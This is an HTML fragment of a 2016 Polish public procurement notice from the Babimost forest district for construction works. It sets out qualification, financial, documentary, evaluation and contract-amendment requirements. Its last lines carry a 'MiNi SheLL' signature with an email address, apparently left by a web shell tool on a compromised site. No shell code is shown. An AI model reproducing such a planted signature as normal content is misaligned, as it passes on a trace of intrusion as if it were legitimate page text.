Osoby przewidziane do pełnienia samodzielnych funkcji technicznych w budownictwie muszą posiadać wymagane uprawnienia, które zostały wydane zgodnie z ustawą Prawo budowlane z dnia 7 lipca 1994 r. ((Dz. U. z 2016 r. poz. 290 z późn. zm.) art. 12 ust. 1 ppkt. 2, ust. 7, art. 12a lub uprawnienia uzyskane na podstawie przepisów obowiązujących przed wejściem w życie ustawy Prawo budowlane z 1994 r., oraz spełniać  warunki do wykonywania tych funkcji określone w tejże ustawie. Uprawnienia te muszą jednocześnie odpowiadać przedmiotowi zamówienia oraz rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11.09.2014 r., w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2014 r., poz. 1278)  lub równorzędne.
Natomiast w przypadku osób, które uzyskały uprawnienia w państwach członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państwach członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym, posiadane uprawnienia muszą spełniać warunki określone w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63 poz. 394 z późn. zm.). Osoby spoza terytorium Rzeczpospolitej Polskiej muszą się legitymować decyzją o uznaniu kwalifikacji zawodowych lub decyzją o prawie do świadczenia usług transgranicznych, wydanymi przez właściwe rady izby inżynierów, albo udokumentować, że zdały egzamin na uprawnienia budowlane przed właściwą Izbą.
Ocena spełnienia powyższych warunków udziału w niniejszym postępowaniu będzie polegać na sprawdzeniu kompletności i poprawności złożonych dokumentów i oświadczeń. Z treści załączonych dokumentów musi wynikać jednoznacznie iż, ww. warunki Wykonawca spełnił. Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem Wykonawcy z postępowania. Ocena zostanie dokonana w oparciu o zasadę: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca wykazał i udokumentował iż dysponuje środkami finansowymi lub zdolnością kredytową na kwotę minimum 100 000,00 zł.
W przypadku, gdy Wykonawca dla potwierdzenia spełniania warunku posiadania zdolności ekonomiczno-finansowej przedstawi dokumenty zawierające kwoty wyrażone w walutach innych niż złoty polski, Zamawiający przeliczy je na PLN. Do przeliczenia zostanie zastosowany wyliczony i ogłoszony przez Narodowy Bank Polski bieżący kurs średni wymiany na dzień wystawienia informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej.
Uwaga: Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych  do wykonania zamówienia, zdolnościach finansowych                               lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Dokument ten powinien wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia Wykonawcy, ubiegającemu się o zamówienie odpowiedniego zasobu, czyli wskazać jego zakres, rodzaj, czas udzielenia, a także inne istotne okoliczności, w tym wynikające ze specyfiki tego zasobu (Dokument ten wymagany jest w formie oryginału lub kopii poświadczonej notarialnie).  Wykonawcy, o których mowa wyżej odpowiadają solidarnie z Wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponoszą winy.
Uwaga: Jeżeli podmioty, na zasoby których powołuje się Wykonawca w celu spełnienia warunków udziału w postępowaniu mają być podwykonawcami, Wykonawca zobowiązany jest wskazać nazwy (Firmy) tych podmiotów - na  załączniku  nr 1 do SIWZ  - formularz oferty. Jeżeli w trakcie realizacji zamówienia Wykonawca zamierza zmienić podwykonawcę lub zrezygnować z podwykonawcy, na zasoby którego Wykonawca powoływał się w celu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ustawy, Wykonawca zobowiązany jest wykazać Zamawiającemu, że proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia warunki udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
Ocena spełnienia powyższych warunków udziału w niniejszym postępowaniu będzie polegać na sprawdzeniu kompletności i poprawności złożonych dokumentów i oświadczeń. Z treści załączonych dokumentów musi wynikać jednoznacznie iż, ww. warunki Wykonawca spełnił. Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem Wykonawcy z postępowania. Ocena zostanie dokonana w oparciu o zasadę: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I. Strony dopuszczają zmianę postanowień umowy zgodnie z wymogami art. 144 ustawy Prawo   zamówień publicznych w przypadku:
a) w wyniku realizacji zasad i wytycznych władz zwierzchnich Zamawiający będzie zobowiązany do ograniczenia środków przewidzianych na sfinansowanie zamówienia;
b) w trakcie realizacji zamówienia zostanie ujawniony błąd Zamawiającego (np. w szczegółowym opisie przedmiotu zamówienia, niemożliwy do zauważenia przez Wykonawców w postępowaniu poprzedzającym wybór najkorzystniejszej oferty;
c) w wyniku urzędowej zmiany stawki podatku VAT.  Należny podatek VAT naliczony zostanie do ceny netto w fakturze wg stawki zgodnej z obowiązującym prawem w dniu wystawienia faktury, co nie dotyczy przypadków objęcia Wykonawcy, który w dniu podpisania umowy nie był płatnikiem VAT, obowiązkiem podatkowym w zakresie tego podatku;
d) nastąpi wywierająca bezpośredni wpływ na dalsze wykonywanie umowy zmiana obowiązującego prawa powszechnego (np. ustawy, rozporządzenia, bądź przepisów wewnętrznych, obowiązujących w Państwowym Gospodarstwie Leśnym Lasy Państwowe (zarządzenia, decyzje i wytyczne Dyrektora Generalnego Lasów Państwowych);
e) wystąpienia siły wyższej rozumianej jako wydarzenie lub okoliczność wyjątkową, niezależną od Strony, której nie można było w racjonalny sposób uniknąć lub zaradzić - zmianie ulegnie termin realizacji przedmiotu umowy o czas występowania siły wyższej;
f) w przypadku konieczności wykonania robót dodatkowych nie objętych przedmiotem umowy, a koniecznych do realizacji zamówienia podstawowego, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia - zmianie ulegnie termin realizacji przedmiotu umowy o czas niezbędny do wykonania robót dodatkowych;
g) w zakresie wydłużenia terminu obowiązywania umowy, pod warunkiem, że prace objęte umową zostały wstrzymane przez właściwe organy z przyczyn niezależnych od Wykonawcy, co uniemożliwia terminowe zakończenie realizacji przedmiotu umowy;
h) zmiany nazw, siedziby stron umowy, innych danych identyfikacyjnych oraz zmiany nazwy zadania w budżecie;
i) w zakresie zmniejszenia przedmiotu zmówienia w sytuacji, gdy wykonanie danych robót będzie zbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi przepisami, wykonania przedmiotu umowy ze stosownym pomniejszeniem wynagrodzenia o niewykonane prace;
j) w zakresie terminu wykonania umowy i/lub sposobu wykonania przedmiotu umowy - w sytuacji, gdy możliwe jest wprowadzenie rozwiązania zamiennego, gdy jest to niezbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi przepisami, wykonania przedmiotu umowy;
1) wystąpi konieczność zmiany terminu rozpoczęcia i zakończenia robót budowlanych z powodu procedury odwoławczej do KIO i właściwego sądu okręgowego;

II. Zamawiający dopuszcza możliwość dokonania następujących zmian  w umowie i określa ich warunki:
a) zmiana dokonana na podstawie art. 23 pkt 1 ustawy Prawo budowlane - zmiana w rozwiązaniach projektowych, jeżeli są one uzasadnione koniecznością zwiększenia bezpieczeństwa realizacji robót budowlanych lub usprawnienia procesu budowy;
b) zmiana dokonana na podstawie art. 20 ust. 1 pkt 4 lit. a ustawy Prawo budowlane uzgodniona możliwość wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez Kierownika Robót lub Inspektora Nadzoru Inwestorskiego, a zmiany dokonane zostały podczas wykonywania robót i nie odstępują w sposób istotny od zatwierdzonego projektu i dokonane zostały zgodnie z zapisami art. 36a ust. 6 ustawy Prawo budowlane, spełniając zapisy art. 57 ust. 2 ustawy Prawo budowlane;
c) zmiana terminu wykonania przedmiotu umowy możliwa będzie w przypadku:
- konieczności wstrzymania wykonywania całości lub części robót na skutek wystąpienia okoliczności niezależnych od Wykonawcy, w szczególności takich, jak: ujawnienie się  w trakcie wykonywania przedmiotu zamówienia wad dokumentacji projektowej,  konieczność wykonania robót, o których mowa w art. 67 ust. 1 pkt. 5 Ustawy, wprowadzenie do dokumentacji projektowej zmian, a warunkiem zmiany będzie potwierdzenie  w dokumentacji budowy, przez Inspektora Nadzoru Inwestorskiego lub projektanta sprawującego nadzór autorski, wystąpienia okoliczności uzasadniających konieczność zmiany terminu  wykonania robót lub przerw w  ich realizacji;
- pisemnego uzgodnienia pomiędzy Stronami dotyczącego skróceniu terminu zakończenia realizacji umowy;
- konieczność uzyskania niemożliwych do przewidzenia na etapie planowania robót budowlanych: danych, uzgodnień lub pozwoleń osób trzecich lub właściwych organów;
d) zmiana sposobu spełnienia świadczenia na skutek zmian technologicznych spowodowanych 
w szczególności następującymi okolicznościami:
- niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót spowodowania zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń;
- pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy;
- pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy;
- konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych / technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy;
e) w przypadku wystąpienia mniejszej lub większej ilości robót budowlanych niż to pierwotnie   przewidziano w kosztorysie ofertowym, rozliczenie nastąpi na podstawie zatwierdzonego przez Inspektora Nadzoru zweryfikowanego kosztorysu ofertowego zgodnie z książką obmiarów;  
f) w przypadku robót nie uwzględnionych w przedmiarze oraz nie wycenionych w kosztorysie ofertowym,   które są niezbędne do wykonania Umowy a ujętych w projekcie budowlanym oraz robót zamiennych wynagrodzenie wykonawcy za wykonanie tych robót zostanie ustalone z zastosowaniem wskaźników kalkulacyjnych  i cen materiałów określonych w ofercie Wykonawcy a w przypadku ich braku obowiązujących w dniu ich rozliczenia cen średnich ujętych w Wydawnictwie SEKOCENBUD dla województwa lubuskiego; 
g) W uzasadnionych przypadkach dopuszcza się wprowadzanie zmian w stosunku do dokumentacji realizacji robót budowlanych: a) na wniosek Wykonawcy, za zgodą Zamawiającego, w trakcie prowadzenia robót, mogą być dokonywane zmiany technologii wykonania elementów robót. Dopuszcza się je tylko w przypadku, gdy proponowane przez Wykonawcę rozwiązanie jest równorzędne lub lepsze funkcjonalnie od tego, jakie przewiduje dokumentacja wykonania robót budowlanych. W tym przypadku Wykonawca przedstawia projekt zamienny zawierający opis proponowanych zmian wraz z rysunkami. Projekt taki wymaga akceptacji i zatwierdzenia do realizacji przez Zamawiającego. b) w przypadku, gdy z punktu widzenia Zamawiającego zachodzi potrzeba zmiany rozwiązań technicznych wynikających z umowy Zamawiający sporządza protokół konieczności, a następnie dostarcza dokumentację na te roboty wraz ze zleceniem ich wykonania;
h) zmiany dokonane według zasad zapisanych w umowie;
i) zmiana osób odpowiedzialnych za kontakty  i nadzór nad przedmiotem umowy;
j) zmiana Podwykonawcy pod warunkiem odpowiedniego zgłoszenia i po akceptacji przez Zamawiającego; 
k) zmiana w zakresie wprowadzenia zapisu - informacji o przyznanym lub możliwym dofinansowaniu ze źródeł zewnętrznych;
l) zmiana formy zabezpieczenia należytego wykonania umowy;
m) zmniejszenie zakresu wynagrodzenia z przyczyn o obiektywnym charakterze, istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili jej zawarcia;
n) jeżeli z powodu nadzwyczajnej zmiany stosunków spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą (art. 3571 kc).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lasy.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Babimost ul. Leśna 17, 66-110 Babimost - pok. 21. Na pisemny wniosek wykonawcy, w ciągu 5 dni od złożenia wniosku, bezpłatnie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2016 godzina 09:30, miejsce: Nadleśnictwo Babimost ul. Leśna 17, 66-110 Babimost. Sekretariat - pok. nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com